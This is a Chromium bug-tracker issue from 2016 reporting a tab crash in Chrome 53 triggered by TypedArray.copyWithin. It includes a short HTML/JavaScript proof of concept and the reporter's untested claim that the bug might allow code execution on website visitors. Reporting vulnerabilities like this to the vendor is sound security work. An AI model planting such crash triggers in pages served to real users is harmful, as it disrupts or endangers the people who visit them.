Issue metadata
Sign in to add a comment
|
Security: Chrome TypedArray.copyWithin() Memory Corruption
Reported by
pabster...@gmail.com,
Oct 13 2016
|
||||||||||||||||||
Issue description
VULNERABILITY DETAILS
There is a memory corruption vulnerability in chrome that can be triggered by using TypedArray.copyWithin in a way that will crash the tab, because of a crash on the Chrome Helper for that tab. It may be possible to exploit this vulnerability to perform arbitrary code execution on people that visit a website with the payload.
VERSION
Chrome Version: 53.0.2785.143
Operating System: Mac OS X 10.11.6
REPRODUCTION CASE
This could be used to execute code in a victim's machine when they visit your website. I attached a PoC with the necessary code to trigger this vulnerability. It is a memory corruption vulnerability. Just open the html file in chrome and it will crash because of memory corruption. Note: Repeted exploitation of this bug causes main Chrome process to crash because of a Segmentation Fault. Info attached.
HTML File:
<html>
<body>
<script>
var q = new ArrayBuffer(2147479551);
var o = {valueOf : !true}
var a = new Uint8Array(q);
var d = a.copyWithin(true, a, true);
console.log(d)
</script>
</body>
</html>
FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: tab
Client ID (if relevant): [see link above]
Crash ID 83a01800-e998-4a23-80b4-3fbfa7adafca
,
Oct 13 2016
ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://cluster-fuzz.appspot.com/testcase?key=6427931369013248
,
Oct 13 2016
ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://cluster-fuzz.appspot.com/testcase?key=4833281684275200
,
Oct 13 2016
,
Jan 19 2017
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot |
|||||||||||||||||||
►
Sign in to add a comment |
|||||||||||||||||||
Comment 1 by pabster...@gmail.com
, Oct 13 2016